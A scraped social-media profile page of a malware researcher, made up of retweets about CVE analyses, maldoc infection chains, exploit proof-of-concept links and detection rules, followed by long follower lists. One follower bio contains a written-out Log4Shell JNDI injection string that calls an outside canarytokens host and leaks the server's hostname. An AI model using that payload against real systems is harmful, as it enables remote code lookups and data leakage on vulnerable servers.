0axx3ss @0axx3ss
#MalwareDissector #ThreatResearcher #CoffeeLover #TechGeek Tweets are my own. Joined May 2009-
Tweets567
-
Followers294
-
Following900
-
Likes4K
0axx3ss retweeted
If you want to search for EK tasks in @anyrun_app use SID instead of tag. For example, 2024049 and 2024381 are useful for #RigEK, and 4001761 is for #SpelevoEK. There are many other great signatures you can use in search, such as 4001554 and 10004044.
1
15
45
0
0
Download Image
0axx3ss retweeted
I did a small investigation into inner workings of of CVE-2019-1458. Reported in December, used in the wild. Here is my analysis: github.com/piotrflorczyk/…
0axx3ss retweeted
Microsoft SharePoint - Deserialization Remote Code Execution POC github.com/Voulnet/deshar…
0axx3ss retweeted
First exploitation of CVE-2019-0752 found in watering hole websites related to North Korea. Dropped malware is a new version of SLUB, the malware we found in March which uses Slack as C&C blog.trendmicro.com/trendlabs-secu…
0axx3ss retweeted
In latest @ESET research, @zuzana_hromcova looks at a campaign that spreads #malware via #torrents, using South Korean TV content as a lure. #infosec #backdoor #cybercrime welivesecurity.com/2019/07/08/sou…
0axx3ss retweeted
RDP Vuln CVE-2019-0708 aka #BlueKeep Detection What do we have? Sigma Rules github.com/Neo23x0/sigma/… github.com/Neo23x0/sigma/… by @markus_neis Suricata Rule github.com/nccgroup/Cyber… by @edeca Scanner github.com/zerosum0x0/CVE… by @JaGoTu & @zerosum0x0
0axx3ss retweeted
Interesting #maldoc! xls -> Macro -> PowerShell -> MSBuild -> SILENTTRINITY app.any.run/tasks/71704ca4…
0axx3ss retweeted
Pushed some #HiddenCobra #YARA rules for HOPLIGHT malware to the public signature-base (immediately available for LOKI, in SPARK Core after QS runs) github.com/Neo23x0/signat…
0axx3ss retweeted
#PatchTuesday is here, so is my promised blog post. #CVE-2019-084 Windows AppX Deployment Service (AppXSVC) improperly handles hard links allowing for privilege escalation. krbtgt.pw/dacl-permissio…
0axx3ss retweeted
2019-03-27: [Technical] Let's Learn: Dissecting "Operation #ShadowHammer" #Shellcode Internals in 'crt_ExitProcess' | GetAdaptersInfo MAC Parser -> MD5{Init,Update,Final} | memcmp MD5 Targeted List | C2 Comm | Oddity -> +7 Days ⏲️ File Logger .ini Setup 🔦 vkremez.com/2019/03/lets-l…
0axx3ss retweeted
Interesting #maldoc! doc -> Macro -> VBScript -> C# (AMSI Bypass + PowerShell without PowerShell) -> PowerShell RAT🤔 app.any.run/tasks/86a188db…
0axx3ss retweeted
#MuddyWater #maldoc doc -> Macro -> VBScript -> PowerShell -> #POWERSTATS app.any.run/tasks/c1475060…
0axx3ss retweeted
Network Forensics, Part 2: Packet-Level Analysis of the NSA's EternalBlue Exploit #dfir #digitalforensics #cybersecurity #eternalblue bit.ly/2SgKCyK
0axx3ss retweeted
Warning! Upgrades in the #WinRAR vulnerability (#CVE-2018-20250) exploit, use social engineering to lure victims with embedded image files and encrypt the malicious ACE archive before delivering. Analysis report: ti.360.net/blog/articles/… Chinese version: mp.weixin.qq.com/s/hAoee3Z90Fyx…
0axx3ss retweeted
#APT #ACE CVE-2018-20250 exploit vulnerability, APT attack on second North American summit, 'Operation Hiden Python' blog.alyac.co.kr/2160
0axx3ss retweeted
Possibly the first malware delivered through mail to exploit WinRAR vulnerability. The backdoor is generated by MSF and written to the global startup folder by WinRAR if UAC is turned off. virustotal.com/#/file/7871204… IOC: hxxp://138.204.171.108/BxjL5iKld8.zip 138.204.171.108:443
0axx3ss retweeted
0axx3ss retweeted
My next C2 will be hosted in Excel. github.com/michaelneu/web… combined with Excel Add-in for persistence, Excel DDE for lateral movement, and Excel IQY files for execution. A full testing framework in Excel.
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
blackorbird @blackorbird
36K Followers 672 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit #CTI Need Job
Andrew Thompson @ImposeCost
39K Followers 1K Following Head of Global Signals Operations @Google Threat Intelligence Group via @Mandiant acquisition. Posts are attributable to me—not my employer. Former @USMC.
Mohammed @ItsMohCy
0 Followers 20 Following أول هوية رقمية عراقية مختصة في استخبارات التهديدات السيبرانية 🇮🇶 | نشر تحليلات، أدوات، وثغرات حقيقية بلغة مبسطة
timlake @timlake252160
0 Followers 2K Following
Lifir @Lifir529
86 Followers 3K Following
nanjin002 @nanjin00272827
21 Followers 4K Following
crawler_cookie_0 @crawler_cookie0
53 Followers 4K Following
Raybo 🍺 @lewiray
841 Followers 3K Following #CyberSecurity, #Sysadmin, wife, four kids and #SCUBA occupy most of my time. US Army vet. Life is good! All my opinions are belong to me. Cheers!
Mathew @mittypk
1K Followers 758 Following Frontline Intel Ops 🦅 Advanced Practices @Mandiant | AU Military DCO | My views are my own
Satans0days @satans0days
19 Followers 127 Following Hacker clothing line, for hackers, created by hackers. Owner: @REal0day
AxN788CN @TranTuan3042022
0 Followers 4K Following
Albert Aktemor @AAktemor
4 Followers 225 Following
Bilal Muqeet. @blmqt
630 Followers 3K Following Incident Response, APT enthusiast GCIH, CRTP, eCTHP, eCIR Occasional bug bounty hunter @ https://t.co/cFXGkB0i6U #infosec #cybersecurity #blueteam
Adrian Cristian Pop @AdrianCristianP
13 Followers 1K Following
Marcos Vinicios (MV) @iamveene
111 Followers 3K Following I'm here for Offensive Security, Threat Intelligence, Reverse Engineering, Malware Analysis, DFIR, Defense Evasion, Windows Internals, and cyber black magic.
Jared Wilson @JWilsonSecurity
2K Followers 1K Following Mandiant Research and Discovery, Father, Husband, Trail Runner, Co-Founder CyberFriendsCircle
Lawrence @Lawrenc52280603
231 Followers 2K Following Research And Security. Want to learn and help the IT community. Tweets are my own
Steve YARA Synapse Mi... @stvemillertime
17K Followers 1K Following threat intelligence @google writing & sharing on adversary tradecraft, malware, threat detection, AI-nexus intel and all things #yara
⚛️ Marcin Siedlar... @siedlmar
2K Followers 1K Following Technical attribution of cyber threats | Frontline Intrusion Intelligence 🦅 @Mandiant
Hayabussy @_hayabussy
674 Followers 259 Following
0x4143 @0x4143
2K Followers 5K Following Purple Teaming by day, Malware Hunter by night 🏴 (All opinions are my own, not of my employer)
Hieu Tran @HieuTra34558978
160 Followers 179 Following Threat Detection Engineer at FPT and also a Dota2 Player.
🅾🅻🅸🆅🅸�... @Olivia_99680
45 Followers 2K Following Do you want to get my most favorite photo in Direct? Add me!I want to meet new guys! 😊😊😚
avallach (@xorhex@inf... @xorhex
1K Followers 1K Following 🇺🇦Malware Researcher 🇺🇦 Tweets are my own and do not reflect my employer. On Mastodon as @[email protected] Creator of https://t.co/woQLhjSmV0
Bertrands Deals @BertrandsDeals
138 Followers 2K Following Bertrands Deals is an e-commerce focused on providing great deals on electronics! We offer laptops, headphones, tablets, smartphones, & more! Come check us out.
N00b_Master @N00bMaster2
7 Followers 224 Following
Aragorn Tseng @Aragorntseng
454 Followers 408 Following Malware Researcher / Incident Response / Threat Intelligence
Adrian Hernandez @Sapphirex00
782 Followers 411 Following Threat Analysis in Advanced Practices🦅 @Mandiant @Google. Interested in CNE and Intelligence. Personal account, my opinions are my own.
1xd @1xd18
36 Followers 612 Following Security Analyst in Beijing, Threat Intelligence & Machine Learning & DeepLearning & APT Researcher.
YCY @batrix20
254 Followers 443 Following 🇹🇼 Malware Research Freelancer / Threat Intelligence Analyst / Security Engineer * My thoughts are my own *
tjm-111 @tjm_1232
7 Followers 451 Following
AV-ATLAS @avatlasorg
204 Followers 182 Following AV-TEST Platform. Legal Notice https://t.co/jf3pK3zvRT… & Data Privacy https://t.co/keSdq5udqK
___alecs @_____alecs_____
33 Followers 2K Following
Jawaid Ali @NetscalerJunkie
1K Followers 3K Following Head of Security, GDPR Practitioner. Tackling #CISSP & #OSCP.
BlackOpsCTI 🇺🇦 @OpsCti
80 Followers 1K Following Eat | Sleep | Hack | Repeat #ThreatIntelligence #Malware #APT #NewsHunter #DataLeak
cti0x @Cti0x
25 Followers 2K Following
Menard Osena @Menardconnect
1K Followers 554 Following Product Manager/Program Manager. Views are my own. Tweets on Tech, Infosec, Malware, Games & the Philippines.
Albert Zsigovits @albertzsigovits
2K Followers 2K Following Senior Malware Researcher @VMRay 🤖👾🧬🦠 | #malware #ransomware #dfir #apt #threatintel #threatresearch | Opinions expressed are strictly my own.
hideo @hideo_is
410 Followers 4K Following
Florian Roth ⚡️ @cyb3rops
207K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
James @James_inthe_box
22K Followers 466 Following
MalwareHunterTeam @malwrhunterteam
245K Followers 38 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.
Nicolas Krassas @Dinosn
147K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3
Karsten Hahn @struppigel
25K Followers 767 Following MalwareAnalysisForHedgehogs, Principal Malware Researcher at GDATA, he/him 🦔🌈🏳️⚧️
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
BleepingComputer @BleepinComputer
241K Followers 202 Following Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!
blackorbird @blackorbird
36K Followers 672 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit #CTI Need Job
Binni Shah @binitamshah
141K Followers 165 Following Linux Evangelist, Malwares, Security enthusiast , Investor, Contrarian , Philanthropist , Reformist , Sigma female 🦋 https://t.co/WOvf41tMKV
John Hultquist @JohnHultquist
29K Followers 1K Following Chief Analyst, Google Threat Intelligence Group. @CYBERWARCON and @SLEUTHCON founder. Johns Hopkins professor. Army vet.
Andrew Thompson @ImposeCost
39K Followers 1K Following Head of Global Signals Operations @Google Threat Intelligence Group via @Mandiant acquisition. Posts are attributable to me—not my employer. Former @USMC.
Virus Bulletin @virusbtn
60K Followers 1K Following Security information portal, testing and certification body. Organisers of the annual Virus Bulletin conference. @[email protected]
Van @Wanna_VanTa
4K Followers 392 Following Research & Discovery Lead @Mandiant @googlecloud Specialties: researching adversary tradecraft, hardstuck masters TFT, and losing sneaker raffles.
hasherezade @hasherezade
89K Followers 911 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Dan Perez @MrDanPerez
4K Followers 1K Following 🇨🇳Mission TL @Google | #Malware Naming Wizard | #Attribution Connoisseur | All tweets are my own. #ThreatIntel #APT
Mandiant (part of Goo... @Mandiant
127K Followers 4K Following We’re determined to make organizations secure against cyber threats and confident in their readiness.
Chad Tilbury @chadtilbury
22K Followers 599 Following Digital forensics and incident response. Ex-AFOSI, Mandiant, and CrowdStrike. SANS Institute Fellow and co-author of #FOR500 and #FOR508 courses.
Microsoft Threat Inte... @MsftSecIntel
187K Followers 1K Following We are Microsoft's global network of security experts. Follow for security research and threat intelligence.
x0rz @x0rz
96K Followers 420 Following Cybersecurity & Threat Intelligence. Knowledge is power, France is bacon 🥓
Super Sheep (@qutluch... @Qutluch
451 Followers 3K Following When these frail shadows we inhabit now have quit the stage, we'll meet and raise a glass again together in Valhalla.
Mathew @mittypk
1K Followers 758 Following Frontline Intel Ops 🦅 Advanced Practices @Mandiant | AU Military DCO | My views are my own
No Starch Press @nostarch
36K Followers 3K Following The finest in geek entertainment. Email us: [email protected] We're live M-F, 7am-6pm PDT
Shodan @shodanhq
109K Followers 2 Following Monitor your external network, search the Internet of Things and perform empirical market research. You can also find us on https://t.co/nPLFbFy8R5
Reverse Engineering a... @re_and_more
15K Followers 521 Following RE and More by Alexey Kleymenov (https://t.co/s1pWjL46AW). Private classes and group workshops in malware analysis and reverse engineering. #infosec #malware
#DailyBookDrop📚 @DailyBookDrop
581 Followers 22 Following What @ImposeCost is reading. Drops aren’t necessarily recommendations. Threads often contain snippets. Buy books; support authors. Turn on notifications.
ESET Research @ESETresearch
35K Followers 30 Following Security research and breaking news straight from ESET Research Labs.
Will @BushidoToken
36K Followers 3K Following Senior Threat Intel Advisor @TeamCymru | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | Co-founder @BSidesBournemth | @darknetdiaries #126: REvil
Inhee Han @boinya
759 Followers 543 Following Threat Intelligence Researcher GTIG@Google (@Mandiant). Opinions are my own.
Hieu Tran @HieuTra34558978
160 Followers 179 Following Threat Detection Engineer at FPT and also a Dota2 Player.
bubbles @bwithnell
744 Followers 563 Following
DFRLab - @dfrlab.bsky... @DFRLab
53K Followers 762 Following @AtlanticCouncil's Digital Forensic Research Lab. Cultivating a global network of digital forensic analysts (#DigitalSherlocks) to combat disinformation.
Keith KorbenD Wingo @KorbenD_Intel
1K Followers 470 Following Threat synthesis, the Korben Dallas way. Keith Wingo. Christian. Husband. Veteran.
avallach (@xorhex@inf... @xorhex
1K Followers 1K Following 🇺🇦Malware Researcher 🇺🇦 Tweets are my own and do not reflect my employer. On Mastodon as @[email protected] Creator of https://t.co/woQLhjSmV0
Shadow Chaser Group @ShadowChasing1
11K Followers 569 Following Shadow Chaser Group is a sub-group of the GcowSec team which consists of college students who love it.Shadow Chaser Group focused on APT hunt and analysis
tisf @tisfe
99 Followers 120 Following
hex waxwing :(){ :|: ... @hexwaxwing
10K Followers 3K Following //FAILHUNTRESS//// sibyl as a service. curiosity takes precedence; thaasophobic. consilience + negative capability ftw. ¡in girum imus nocte et consumimur igni!
Aragorn Tseng @Aragorntseng
454 Followers 408 Following Malware Researcher / Incident Response / Threat Intelligence
z3r0 @ccxsaber
781 Followers 90 Following
Adrian Hernandez @Sapphirex00
782 Followers 411 Following Threat Analysis in Advanced Practices🦅 @Mandiant @Google. Interested in CNE and Intelligence. Personal account, my opinions are my own.
YCY @batrix20
254 Followers 443 Following 🇹🇼 Malware Research Freelancer / Threat Intelligence Analyst / Security Engineer * My thoughts are my own *
_re_fox @_re_fox
1K Followers 20 Following
neonprimetime @neonprimetime
3K Followers 314 Following detection engineering, malware analysis, IR, threat hunting #DailyThreatHunt, threat intel, blue team, Qradar, Author of now archived @PhishKitTracker project
Cryptolaemus @Cryptolaemus1
20K Followers 207 Following Where are mealybugs now!?! We is hungry and no one wants to play anymore. Where everyone at?
Anonymous @YourAnonCentral
5.3M Followers 928 Following Actions Not Nouns. All that exists is interaction. #Anonymous #BindingChaos Follow us on Bluesky https://t.co/WHmDQZjkDZ
PhishingKitTracker @PhishKitTracker
3K Followers 1 Following Project Paused 1/11/22, Tracked Threat Actor Emails in Phishing Kits. CC @PhishKitTracker if you find a #phishingkit , created by @neonprimetime
AV-ATLAS @avatlasorg
204 Followers 182 Following AV-TEST Platform. Legal Notice https://t.co/jf3pK3zvRT… & Data Privacy https://t.co/keSdq5udqK
Offensive OSINT @the_wojciech
9K Followers 149 Following Pentester/Security Analyst/OSINT Researcher doing cyber security art brut. https://t.co/5bGCU6UuZO https://t.co/GzHh2JDJR5
TeamT5 @TeamT5_Official
2K Followers 22 Following Top Malware Researcher & #Cybersecurity Solution Provider in Asia & Pacific Intelligence Portal: #ThreatVision EDR Solution: #ThreatSonar_Anti_Ransomware
evandrix @evandrix
491 Followers 101 Following ${jndi:ldap://x${hostName}.L4J.mxr7harp21175loyvy9ezpx6s.canarytokens.com/a}
ANY.RUN @anyrun_app
30K Followers 192 Following Empowering businesses with proactive security solutions: Interactive Sandbox, TI Lookup and Feeds. Sign up: https://t.co/8hIX0Qh5ME
Ben Wilson @benhacks
320 Followers 326 Following InfoSec Practitioner 👨💻 | Tinkerer/Hacker 💻🛠️ | Mountain Biker 🚵 | Aussie 🇦🇺
⚛️ Marcin Siedlar... @siedlmar
2K Followers 1K Following Technical attribution of cyber threats | Frontline Intrusion Intelligence 🦅 @Mandiant
Menard Osena @Menardconnect
1K Followers 554 Following Product Manager/Program Manager. Views are my own. Tweets on Tech, Infosec, Malware, Games & the Philippines.
Daniel Lunghi @thehellu
2K Followers 590 Following Threat researcher @TrendMicroRSRCH mostly focused on #APT
Saudi Incident Respon... @SaudiDFIR
9K Followers 181 Following Saudi cybersecurity research group . We do not represent any official gov entity!Trends for United States
121 B posts
4.201 posts
765 B posts
14,8 B posts
2.532 posts
59,4 B posts
2.406 posts
13,5 B posts
29,9 B posts
4.189 posts
10,2 B posts
23,1 B posts
5.398 posts
10,6 B posts
76,7 B posts
91 B posts
23,4 B posts
573 B posts
12,3 B posts
You might like
JaromirHorejsi
@JaromirHorejsi
4K Followers
Seongsu Park
@unpacker
12K Followers
Artsiom Holub
@Mesiagh
3K Followers
ClearSky Cyber Securi...
@ClearskySec
10K Followers
Ankit Anubhav
@ankit_anubhav
8K Followers
Herbie Zimmerman
@HerbieZimmerman
3K Followers
Hybrid Analysis
@HybridAnalysis
11K Followers
avman
@avman1995
7K Followers
R.
@0xrb
6K Followers
Random Robbie
@Random_Robbie
15K Followers
Paul Sec.jpeg .exe
@PaulWebSec
6K Followers
Davide Setti #netneut...
@SettiDavide89
803 Followers
\_(ʘ_ʘ)_/
@pollo290987
4K Followers
Malekal's site
@malekal_morte
7K Followers
Ben Hunter
@B_H101
1K Followers